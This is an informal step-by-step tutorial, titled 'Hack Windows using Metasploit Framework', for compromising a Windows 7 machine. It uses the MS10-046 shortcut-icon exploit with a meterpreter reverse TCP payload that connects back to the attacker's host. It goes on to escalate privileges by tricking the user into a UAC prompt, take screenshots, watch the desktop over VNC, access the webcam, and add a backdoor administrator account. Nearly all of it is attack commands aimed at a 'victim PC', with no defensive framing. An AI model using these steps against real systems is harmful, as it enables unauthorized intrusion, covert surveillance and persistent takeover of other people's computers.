HACK WINDOWS USING METASPLOIT FRAMEWORK

Start metasploit first.

# service postgresql start

# msfconsole (to start Metasploit framework)

#msf > use  exploit/windows/browser/ms10_046_shortcut_icon_dllloader

(exploit means exploting something ddl means dynamic link library it runs a code in
background we get a session of windows 7 known as meter preter session)

#msf > set payload windows/meterpreter/reverse_tcp

(kali injects a payload hence we get a tcp connection through kali and victim
machine)

#msf > set SRVHOST  192.168.81.133  (kali machine ip)

#msf > set LHOST 192.168.81.133 (kali machine ip)

#msf > set LPORT 444

#msf > exploit

Screen will give you URL that must be open on victim (win7) machine copy partial
URL 192.168.81.133\KJqldvPuyU on any Client machine.

http:// 192.168.81.133 /yUqFTYBXVO

CLICK ON ALLOW

a separate window will open , open link file.

Now go to kali machine

Press enter and type

msf > sessions -i 1

meterpreter > getsystem (to get admin system privilege)

(USE TO GETT FULL CONTROL)

(you will get error here as UAC(user account control) is not bypassed)

riv_elevate_getsystem: Operation failed: The environment is incorrect

You must see that meterpreter session has been started.you have to take
administrator privilege on victim pc ,for this you must enumerate as
administrator by following commands

meterpreter> background (run current session 1 in background)

meterpreter> use windows/local/ask

(WE ARE OPENING A DIALOG BOX IN WINDOWS IF IT ALLOW YES

WE GET FULL CONTROL)

msf exploit(windows/local/ask) > set session 1

msf exploit(windows/local/ask) > exploit

Now user on win7 is prompted for UAC , Click OK in victim win 7 pc. After
that on kali another

Meterpreter session 2 is started with administrator credential.

meterpreter> getsystem
now it should succeed.

First see users in victim pc.

meterpreter > screenshot (take victim pc desktop screenshot )

meterpreter > run vnc (to see victim remote desktop live with
view only permission)

meterpreter > run webcam (only if victim pc has webcam and driver
is installed)

Add user to to remote pc and make it member of Local Administratos

group

Method 1

Apart from these default commands, meterpreter can be further strengthen

by using some extensions. For this extension, type “use “ followed by the
name of that extension.

meterpreter > use incognito

(this command enables add_user and like more command modules)

meterpreter > add_user mark 123

meterpreter > add_localgroup_user administrators mark

If you want to go back to meterpreter type exit

C:\Windows\system32> exit